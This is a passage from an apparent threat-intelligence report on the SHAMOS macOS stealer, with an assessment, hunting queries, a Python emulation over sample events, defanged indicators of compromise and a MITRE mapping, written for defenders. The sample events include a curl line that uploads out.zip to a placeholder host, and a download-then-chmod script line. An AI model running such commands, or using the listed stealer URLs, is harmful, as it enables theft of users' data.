Assessment
This campaign highlights that leveraging malvertising and the one-line installation-command technique to distribute macOS information stealers remains popular among eCrime actors. Promoting fake websites through malvertising drives more traffic to them, which in turn yields more potential victims. The one-line installation command lets eCrime actors install the Mach-O executable directly onto the victim’s machine while bypassing Gatekeeper checks.
CrowdStrike Counter Adversary Operations assesses that eCrime actors will likely continue to leverage both malvertising and one-line installation commands to distribute macOS information stealers. This assessment is made with high confidence, as the combination has historically been successful, and these methods allow actors to bypass Gatekeeper checks.
Recommended Prevention Settings
To protect endpoints from this threat, CrowdStrike Falcon® Insight XDR customers should ensure the following prevention policy settings are configured:
- Suspicious process prevention
- Intelligence-sourced threat prevention
Threat Hunting Queries
The following CrowdStrike Falcon® Next-Gen SIEM Advanced Event Search queries are provided to assist defenders in hunting for this and similar activity across their endpoints.
NOTE: Make sure to update the Falcon URL in the GraphExplorer links to the cloud in which your environment is configured (US1, US2, EU, etc.)
“Bash script execution with calls to risky LOOBINs”
event_platform=Mac #event_simpleName=ScriptControlScanInfo ScriptContent="*dscl*curl*xattr*chmod*"
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ScriptContent])
“AppleScript execution under a binary from /tmp/”
event_platform=Mac #event_simpleName=ProcessRollup2 ImageFileName="*/tmp/*"
| join({event_platform=Mac #event_simpleName=ProcessRollup2 ImageFileName="*osascript" CommandLine="*-e*" | rename(field="CommandLine", as="ChildCommandLine") | rename(field="ImageFileName", as="ChildImageFileName")}, field=TargetProcessId, key=ParentProcessId, include=["ChildImageFileName", "ChildCommandLine"], limit=20000)
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ImageFileName, CommandLine, ChildImageFileName, ChildCommandLine])
“Curl with commandline indicative of data exfil”
event_platform=Mac #event_simpleName=ProcessRollup2 FileName=curl CommandLine="*POST*out.zip*"
| format("[GraphExplorer](https://falcon.crowdstrike.com/graphs/process-explorer/tree?id=pid:%s:%s)", field=["aid", "TargetProcessId"], as=GraphExplorer)
| groupBy([aid, GraphExplorer, ImageFileName, CommandLine])
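As an added example (not CrowdStrike's code and not part of the original post), the following Python emulates the three hunting queries above over constructed sample events so their matching rules can be checked offline; the field names follow the queries, while the aid, process ids, paths and the c2.invalid host are placeholders. It also makes visible a caveat of the first query: the pattern `*dscl*curl*xattr*chmod*` only matches when the four names occur in that order.

```python
import re

# Constructed sample telemetry shaped like the Falcon fields the queries use; every
# value (aid, process ids, paths, the c2.invalid host) is a placeholder, not campaign data.
EVENTS = [
    # Script naming dscl, curl, xattr and chmod in the order the first query expects.
    {"event_simpleName": "ScriptControlScanInfo", "aid": "a1", "TargetProcessId": "100",
     "ScriptContent": "dscl . -read /Users/$USER; curl -o /tmp/update $U; xattr -c /tmp/update; chmod +x /tmp/update"},
    # Same four tools, different order: the wildcard pattern does NOT match this one.
    {"event_simpleName": "ScriptControlScanInfo", "aid": "a1", "TargetProcessId": "101",
     "ScriptContent": "chmod +x build.sh; xattr -d com.apple.quarantine build.sh; curl -O $U; dscl . -list /Users"},
    {"event_simpleName": "ProcessRollup2", "aid": "a1", "TargetProcessId": "200", "ParentProcessId": "5",
     "ImageFileName": "/tmp/update", "CommandLine": "/tmp/update"},
    {"event_simpleName": "ProcessRollup2", "aid": "a1", "TargetProcessId": "201", "ParentProcessId": "200",
     "ImageFileName": "/usr/bin/osascript", "CommandLine": "osascript -e 'display notification hello'"},
    {"event_simpleName": "ProcessRollup2", "aid": "a1", "TargetProcessId": "202", "ParentProcessId": "200",
     "ImageFileName": "/usr/bin/curl", "FileName": "curl",
     "CommandLine": "curl -X POST -F file=@/tmp/out.zip http://c2.invalid/upload"},
]

def cql_wildcard(value: str, pattern: str) -> bool:
    """Emulate a CQL field="..." test: '*' matches anything, the literal pieces must
    occur in order, the match is anchored at both ends and is case-sensitive."""
    regex = "^" + ".*".join(re.escape(p) for p in pattern.split("*")) + "$"
    return re.search(regex, value, re.DOTALL) is not None

def graph_link(aid: str, pid: str, falcon_url: str = "https://falcon.crowdstrike.com") -> str:
    """Reproduce the format() step; pass the base URL of the cloud your tenant lives in."""
    return f"[GraphExplorer]({falcon_url}/graphs/process-explorer/tree?id=pid:{aid}:{pid})"

def hunt_risky_lolbins(events: list) -> list:
    """Query 1: scripts that call dscl, curl, xattr and chmod, in that order."""
    return [graph_link(e["aid"], e["TargetProcessId"]) for e in events
            if e["event_simpleName"] == "ScriptControlScanInfo"
            and cql_wildcard(e["ScriptContent"], "*dscl*curl*xattr*chmod*")]

def hunt_tmp_osascript(events: list) -> list:
    """Query 2: join TargetProcessId -> ParentProcessId to find osascript -e under a /tmp/ binary."""
    pr2 = [e for e in events if e["event_simpleName"] == "ProcessRollup2"]
    parents = {e["TargetProcessId"]: e for e in pr2 if cql_wildcard(e["ImageFileName"], "*/tmp/*")}
    return [(parents[c["ParentProcessId"]]["ImageFileName"], c["CommandLine"]) for c in pr2
            if c.get("ParentProcessId") in parents and cql_wildcard(c["ImageFileName"], "*osascript")
            and cql_wildcard(c["CommandLine"], "*-e*")]

def hunt_curl_exfil(events: list) -> list:
    """Query 3: curl POSTing an archive named out.zip."""
    return [e["CommandLine"] for e in events if e["event_simpleName"] == "ProcessRollup2"
            and e.get("FileName") == "curl" and cql_wildcard(e["CommandLine"], "*POST*out.zip*")]
```

Against the sample set, only the first script, the osascript child of /tmp/update, and the POST of out.zip are returned; the out-of-order script is silently missed, which is worth remembering when tuning the first query.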
Indicators of Compromise (IOCs)
IOC | Description
--- | ---
mac-safer[.]com, rescue-mac[.]com, https[:]//github[.]com/jeryrymoore/Iterm2 | Malvertising websites containing instructions to download SHAMOS
231c4bf14c4145be77aa4fef36c208891d818983c520ba067dda62d3bbbf547f, eb7ede285aba687661ad13f22f8555aab186debbadf2c116251cb269e913ef68 | Bash script SHA256 hashes
4549e2599de3011973fde61052a55e5cdb770348876abc82de14c2d99575790f, b01c13969075974f555c8c88023f9abf891f72865ce07efbcee6c2d906d410d5, a4e47fd76dc8ed8e147ea81765edc32ed1e11cff27d138266e3770c7cf953322, 95b97a5da68fcb73c98cd9311c56747545db5260122ddf6fae7b152d3d802877 | SHAMOS Mach-O SHA256 hashes
https[:]//icloudservers[.]com/gm/install[.]sh, https[:]//macostutorial[.]com/iterm2/install[.]sh | Bash script host URLs
https[:]//icloudservers[.]com/gm/update, https[:]//macostutorial[.]com/iterm2/update | SHAMOS host URLs
MITRE ATT&CK Framework
The following table maps reported COOKIE SPIDER and SHAMOS tactics, techniques, and procedures (TTPs) to the MITRE ATT&CK® framework.
ID | Technique | Description
--- | --- | ---
T1583.001 | Acquire Infrastructure: Domains | The eCrime actor registered fake macOS help websites
T1189 | Drive-by Compromise | Malvertising distributes websites containing SHAMOS installation instructions
T1204 | User Execution | SHAMOS requires the user to execute the malicious installer command
T1027.010 | Obfuscated Files or Information: Command Obfuscation | The malicious command uses Base64-encoding to obfuscate the Bash script download URL
T1105 | Ingress Tool Transfer | The malicious Bash script downloads SHAMOS from an external URL
Additional Resources
1. The legitimate iTerm2 GitHub repository is located at https[:]//github[.]com/gnachman/iTerm2.